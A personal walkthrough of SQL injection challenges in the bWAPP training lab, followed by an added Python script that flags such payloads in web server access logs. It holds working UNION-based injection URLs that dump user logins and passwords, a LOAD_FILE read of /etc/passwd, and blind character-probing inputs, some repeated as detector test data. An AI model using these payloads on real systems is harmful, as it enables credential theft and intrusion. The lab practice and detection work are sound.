These are my quick notes, recorded as I worked through bWAPP v2.2.
--- SQLi GET / Search Results - With security level set to low
URL with SQLi:
http://bwapp/sqli_1.php?title=a' union SELECT 1,table_schema,table_name,4,5,6,7 FROM information_schema.tables WHERE table_schema!='mysql' AND table_schema!='information_schema&action=search
The above query was taken from the MySQL SQL Injection Cheat Sheet located here. The purpose of this query is to return the database and table names of the database. I also had to experiment with the number of columns the original query expects and with how they are displayed.
Now I need to find out the structure of the tables...
URL for SQLi:
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,%20table_name,%204,column_name,6,7%20FROM%20information_schema.columns%20WHERE%20column_name=%27password%27%20AND%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema&action=search
The above SQL injection returns the columns of every table that has a column named password, so now we can formulate a query to begin extracting information. The query below counts the records in the users table before we extract them, in case a large number of records is available.
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20count%28*%29,%203,%204,%205,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search
This returns a count of 2 records that can be extracted.
http://bwapp/sqli_1.php?title=a%27%20union%20SELECT%201,%20login,%20password,%20email,%20admin,%206,%207%20FROM%20bWAPP.users%20where%20login!=%27zaz&action=search
The above query returned the login, password, email and admin flag of each user in the search results...
--- SQLi GET / Select - With security level set to low...
In this challenge only 1 record is returned at a time because, on inspecting the code, it does not loop over the returned recordset. This adds a small challenge, but it is not impossible to do the same thing as above.
SQLi URL:
http://bwapp/sqli_2.php?movie=99%20union%20SELECT%201,table_schema,table_name,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27&action=go
The above query returns the 99th row of the UNION-selected query and also loads the /etc/passwd file, so we can gather the user names on the system.
SQL Injection Boolean Based
— The method below would allow for trying each character in a character set until the query comes back true for the correct character...
Iron Man' AND SUBSTRING(@@hostname,1,1) = 'b - Worked
Iron Man' AND SUBSTRING(@@hostname,2,1) = 'W - Worked
— What if we use regular expressions to determine whether the letter falls within a range of characters...
Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-n] - Returns True
Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-g] - Returns True
Iron Man' AND SUBSTRING(@@hostname,1,1) REGEXP '[a-c] - Returns True
— This narrows it down to fewer than 8 queries to figure out the first character of the hostname... It would have taken 2 or 28, depending on whether you started with a-z or A-Z.
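From the defender's side, the requests above leave distinctive shapes in the web server access log (UNION SELECT stacking, information_schema enumeration, LOAD_FILE() reads and SUBSTRING()-based character probing). The following Python script is an added example, not part of the original notes or of bWAPP: it decodes the query string of each logged request and flags parameters matching those shapes. The signature names and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request-line extractor for Apache/nginx style access logs.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*? "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Probe shapes seen in the walkthrough above: UNION SELECT stacking, enumeration of
# information_schema, LOAD_FILE() reads and SUBSTRING()-based character probing.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "file_read": re.compile(r"\bload_file\s*\(", re.I),
    "boolean_char_probe": re.compile(r"\bsubstring\s*\(.*?\)\s*(=|regexp|like)\s*'", re.I | re.S),
}

def classify_value(value):
    """Return the names of every signature that matches one decoded parameter value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))

def inspect_request(target):
    """Decode the query string of a request target (parse_qs undoes %XX and '+')
    and return {param: [signature, ...]} for parameters that hit a signature."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = {}
    for name, values in params.items():
        matched = sorted({sig for v in values for sig in classify_value(v)})
        if matched:
            hits[name] = matched
    return hits

def scan_log(lines):
    """Return (source_ip, path, hits) for every request that trips a signature."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if m:
            hits = inspect_request(m.group("target"))
            if hits:
                findings.append((m.group("src"), urlsplit(m.group("target")).path, hits))
    return findings

# Constructed sample log: the first three requests mirror the payload shapes above,
# the fourth is an ordinary search and must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2015:10:00:01 +0000] "GET /sqli_1.php?title=a%27%20union%20SELECT%201,table_schema,table_name,4,5,6,7%20FROM%20information_schema.tables&action=search HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2015:10:00:09 +0000] "GET /sqli_2.php?movie=99%20union%20SELECT%201,2,3,4,LOAD_FILE%28%27/etc/passwd%27%29,6,7%20FROM%20information_schema.tables&action=go HTTP/1.1" 200 6001',
    '10.0.0.5 - - [01/Jan/2015:10:00:15 +0000] "GET /sqli_1.php?title=Iron+Man%27+AND+SUBSTRING(%40%40hostname,1,1)+REGEXP+%27[a-n]&action=search HTTP/1.1" 200 910',
    '10.0.0.9 - - [01/Jan/2015:10:01:00 +0000] "GET /sqli_1.php?title=Iron+Man&action=search HTTP/1.1" 200 910',
]
```

Calling scan_log(SAMPLE_LOG) flags the first three requests with the signatures they trip and leaves the plain "Iron Man" search alone; in practice a burst of boolean_char_probe hits from one source is the tell for the blind enumeration shown above.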
Twitter: @lokut